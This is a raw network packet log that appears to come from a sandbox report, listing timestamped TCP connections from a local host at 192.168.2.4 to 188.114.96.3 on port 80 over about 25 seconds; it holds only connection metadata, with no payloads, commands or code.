Sep 25, 2024 15:28:40.327199936 CEST	49734	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:40.329387903 CEST	49734	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:40.334189892 CEST	80	49734	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:40.334278107 CEST	49734	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:40.339200020 CEST	80	49734	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.113013983 CEST	80	49734	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.113235950 CEST	49734	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.115155935 CEST	80	49734	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.115250111 CEST	49734	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.118035078 CEST	80	49734	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.259355068 CEST	49735	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.265642881 CEST	80	49735	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.265758991 CEST	49735	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.267832994 CEST	49735	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.272813082 CEST	80	49735	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.272882938 CEST	49735	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.277914047 CEST	80	49735	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.990243912 CEST	80	49735	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.990382910 CEST	49735	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.991692066 CEST	80	49735	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:41.991744995 CEST	49735	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:41.995244980 CEST	80	49735	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.142637014 CEST	49736	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:42.147733927 CEST	80	49736	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.147967100 CEST	49736	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:42.149990082 CEST	49736	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:42.154841900 CEST	80	49736	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.154915094 CEST	49736	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:42.159766912 CEST	80	49736	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.844978094 CEST	80	49736	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.845237970 CEST	49736	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:42.846381903 CEST	80	49736	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.846435070 CEST	49736	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:42.850104094 CEST	80	49736	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.993716002 CEST	49737	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:42.998670101 CEST	80	49737	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:42.998744965 CEST	49737	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:43.000952959 CEST	49737	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:43.005825996 CEST	80	49737	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:43.005872011 CEST	49737	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:43.010694027 CEST	80	49737	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:43.869628906 CEST	80	49737	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:43.869837999 CEST	49737	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:43.869956017 CEST	80	49737	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:43.869997978 CEST	49737	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:43.875473022 CEST	80	49737	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.012356043 CEST	49738	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.017435074 CEST	80	49738	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.017508984 CEST	49738	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.019629002 CEST	49738	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.024411917 CEST	80	49738	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.024460077 CEST	49738	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.029251099 CEST	80	49738	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.707027912 CEST	80	49738	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.707278013 CEST	49738	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.708445072 CEST	80	49738	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.708491087 CEST	49738	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.712136030 CEST	80	49738	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.852952003 CEST	49739	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.857894897 CEST	80	49739	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.857985973 CEST	49739	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.860066891 CEST	49739	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.864907026 CEST	80	49739	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:44.864953041 CEST	49739	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:44.869745016 CEST	80	49739	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:45.626015902 CEST	80	49739	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:45.626257896 CEST	49739	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:45.627823114 CEST	80	49739	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:45.627887011 CEST	49739	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:45.631217957 CEST	80	49739	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:45.782255888 CEST	49740	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:45.787251949 CEST	80	49740	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:45.787343025 CEST	49740	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:45.789467096 CEST	49740	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:45.794411898 CEST	80	49740	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:45.794466972 CEST	49740	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:45.799334049 CEST	80	49740	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:46.435095072 CEST	80	49740	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:46.435200930 CEST	49740	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:46.436178923 CEST	80	49740	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:46.436228991 CEST	49740	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:46.440257072 CEST	80	49740	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:46.574280977 CEST	49741	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:46.579329967 CEST	80	49741	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:46.579427958 CEST	49741	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:46.581696033 CEST	49741	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:46.586535931 CEST	80	49741	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:46.586604118 CEST	49741	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:46.591473103 CEST	80	49741	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:47.271536112 CEST	80	49741	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:47.272280931 CEST	49741	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:47.272300959 CEST	80	49741	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:47.274977922 CEST	49741	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:47.278218985 CEST	80	49741	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:47.446990013 CEST	49743	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:47.451935053 CEST	80	49743	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:47.452121973 CEST	49743	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:47.454394102 CEST	49743	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:47.459290981 CEST	80	49743	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:47.459805965 CEST	49743	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:47.464634895 CEST	80	49743	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:48.160701036 CEST	80	49743	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:48.160931110 CEST	49743	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:48.161962986 CEST	80	49743	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:48.162698030 CEST	49743	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:48.165786982 CEST	80	49743	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:48.309005976 CEST	49745	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:48.321774006 CEST	80	49745	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:48.321847916 CEST	49745	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:48.324156046 CEST	49745	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:48.329097986 CEST	80	49745	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:48.329147100 CEST	49745	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:48.334855080 CEST	80	49745	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.039150953 CEST	80	49745	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.039252043 CEST	49745	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.039840937 CEST	80	49745	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.039882898 CEST	49745	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.044212103 CEST	80	49745	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.186640024 CEST	49747	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.191790104 CEST	80	49747	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.191864014 CEST	49747	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.194071054 CEST	49747	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.198956966 CEST	80	49747	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.199141979 CEST	49747	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.203989983 CEST	80	49747	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.977329969 CEST	80	49747	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.978431940 CEST	80	49747	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:49.978517056 CEST	49747	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.978568077 CEST	49747	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:49.983395100 CEST	80	49747	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:50.175436974 CEST	49749	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:50.180425882 CEST	80	49749	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:50.180486917 CEST	49749	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:50.183876991 CEST	49749	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:50.188741922 CEST	80	49749	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:50.188831091 CEST	49749	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:50.193696022 CEST	80	49749	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:50.951734066 CEST	80	49749	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:50.951996088 CEST	80	49749	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:50.952045918 CEST	49749	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:50.952045918 CEST	49749	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:50.956866980 CEST	80	49749	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.089889050 CEST	55890	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.095062971 CEST	80	55890	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.095141888 CEST	55890	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.097384930 CEST	55890	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.102354050 CEST	80	55890	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.102415085 CEST	55890	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.109996080 CEST	80	55890	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.830784082 CEST	80	55890	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.830924034 CEST	55890	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.831043959 CEST	80	55890	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.831104040 CEST	55890	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.835886955 CEST	80	55890	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.980936050 CEST	55892	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.985852003 CEST	80	55892	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.986074924 CEST	55892	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.987924099 CEST	55892	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.992711067 CEST	80	55892	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:51.992772102 CEST	55892	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:51.997621059 CEST	80	55892	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:52.731527090 CEST	80	55892	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:52.731555939 CEST	80	55892	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:52.731636047 CEST	55892	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:52.731671095 CEST	80	55892	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:52.731698990 CEST	55892	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:52.731728077 CEST	55892	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:52.736495972 CEST	80	55892	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:52.867918968 CEST	55893	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:52.872875929 CEST	80	55893	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:52.874725103 CEST	55893	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:52.876682997 CEST	55893	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:52.881469965 CEST	80	55893	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:52.881678104 CEST	55893	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:52.886524916 CEST	80	55893	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:53.549809933 CEST	80	55893	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:53.550543070 CEST	80	55893	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:53.550695896 CEST	55893	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:53.550755978 CEST	55893	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:53.555609941 CEST	80	55893	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:53.714428902 CEST	55894	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:53.719377041 CEST	80	55894	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:53.719665051 CEST	55894	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:53.721658945 CEST	55894	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:53.726501942 CEST	80	55894	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:53.727655888 CEST	55894	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:53.732451916 CEST	80	55894	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:54.379558086 CEST	80	55894	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:54.379847050 CEST	55894	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:54.381952047 CEST	80	55894	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:54.382040977 CEST	55894	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:54.384675026 CEST	80	55894	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:54.525326967 CEST	55895	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:54.530510902 CEST	80	55895	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:54.530628920 CEST	55895	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:54.532691956 CEST	55895	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:54.537664890 CEST	80	55895	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:54.537764072 CEST	55895	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:54.542612076 CEST	80	55895	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:55.229852915 CEST	80	55895	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:55.230196953 CEST	55895	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:55.230751991 CEST	80	55895	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:55.230811119 CEST	55895	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:55.235086918 CEST	80	55895	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:55.368535042 CEST	55896	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:55.506407976 CEST	80	55896	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:55.506495953 CEST	55896	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:55.508654118 CEST	55896	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:55.513530016 CEST	80	55896	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:55.513578892 CEST	55896	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:55.518429995 CEST	80	55896	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:56.263027906 CEST	80	55896	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:56.263320923 CEST	55896	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:56.263516903 CEST	80	55896	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:56.263571978 CEST	55896	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:56.268224955 CEST	80	55896	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:56.400232077 CEST	55897	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:56.405261993 CEST	80	55897	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:56.405390978 CEST	55897	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:56.407444000 CEST	55897	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:56.412307024 CEST	80	55897	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:56.412404060 CEST	55897	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:56.417293072 CEST	80	55897	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:57.191807985 CEST	80	55897	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:57.191920042 CEST	55897	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:57.192152977 CEST	80	55897	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:57.192229986 CEST	55897	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:57.196980953 CEST	80	55897	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:57.336867094 CEST	55898	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:57.591490030 CEST	80	55898	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:57.591645002 CEST	55898	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:57.593775988 CEST	55898	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:57.598650932 CEST	80	55898	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:57.598722935 CEST	55898	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:57.603569031 CEST	80	55898	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:58.321290016 CEST	80	55898	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:58.321399927 CEST	55898	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:58.322237015 CEST	80	55898	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:58.322285891 CEST	55898	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:58.326272964 CEST	80	55898	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:58.462858915 CEST	55899	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:58.467717886 CEST	80	55899	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:58.467799902 CEST	55899	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:58.469784975 CEST	55899	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:58.474620104 CEST	80	55899	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:58.474678040 CEST	55899	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:58.479572058 CEST	80	55899	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:59.169311047 CEST	80	55899	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:59.169487953 CEST	55899	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:59.170552015 CEST	80	55899	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:59.170604944 CEST	55899	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:59.176151037 CEST	80	55899	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:59.318993092 CEST	55900	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:59.475148916 CEST	80	55900	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:59.475307941 CEST	55900	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:59.477629900 CEST	55900	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:59.484102011 CEST	80	55900	188.114.96.3	192.168.2.4
Sep 25, 2024 15:28:59.484195948 CEST	55900	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:28:59.489350080 CEST	80	55900	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:00.300595045 CEST	80	55900	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:00.300721884 CEST	55900	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:00.301104069 CEST	80	55900	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:00.301153898 CEST	55900	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:00.305746078 CEST	80	55900	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:00.461532116 CEST	55901	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:00.466552973 CEST	80	55901	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:00.466634989 CEST	55901	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:00.468620062 CEST	55901	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:00.473480940 CEST	80	55901	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:00.473536015 CEST	55901	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:00.478383064 CEST	80	55901	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:01.202205896 CEST	80	55901	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:01.202416897 CEST	55901	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:01.202426910 CEST	80	55901	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:01.202487946 CEST	55901	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:01.207279921 CEST	80	55901	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:01.359373093 CEST	55902	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:01.364424944 CEST	80	55902	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:01.364502907 CEST	55902	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:01.367449045 CEST	55902	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:01.372373104 CEST	80	55902	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:01.372432947 CEST	55902	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:01.377341032 CEST	80	55902	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:02.085413933 CEST	80	55902	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:02.085525036 CEST	55902	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:02.086122036 CEST	80	55902	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:02.086163044 CEST	55902	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:02.090432882 CEST	80	55902	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:02.227688074 CEST	55903	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:02.232837915 CEST	80	55903	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:02.232942104 CEST	55903	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:02.234904051 CEST	55903	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:02.239820957 CEST	80	55903	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:02.239881039 CEST	55903	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:02.244776011 CEST	80	55903	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.023292065 CEST	80	55903	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.023324966 CEST	80	55903	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.023456097 CEST	55903	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.023627996 CEST	55903	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.028345108 CEST	80	55903	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.234275103 CEST	55904	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.239249945 CEST	80	55904	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.239325047 CEST	55904	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.271222115 CEST	55904	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.276190042 CEST	80	55904	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.276279926 CEST	55904	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.281040907 CEST	80	55904	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.936767101 CEST	80	55904	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.936889887 CEST	55904	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.938283920 CEST	80	55904	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:03.938391924 CEST	55904	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:03.941766024 CEST	80	55904	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.086853027 CEST	55905	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.092379093 CEST	80	55905	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.092514038 CEST	55905	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.094444990 CEST	55905	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.099798918 CEST	80	55905	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.099860907 CEST	55905	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.107049942 CEST	80	55905	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.757303953 CEST	80	55905	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.757534027 CEST	55905	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.758312941 CEST	80	55905	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.758373976 CEST	55905	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.762455940 CEST	80	55905	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.901523113 CEST	55906	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.906533957 CEST	80	55906	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.906687975 CEST	55906	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.908715010 CEST	55906	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.914587021 CEST	80	55906	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:04.914671898 CEST	55906	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:04.919504881 CEST	80	55906	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:05.574727058 CEST	80	55906	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:05.574850082 CEST	55906	80	192.168.2.4	188.114.96.3
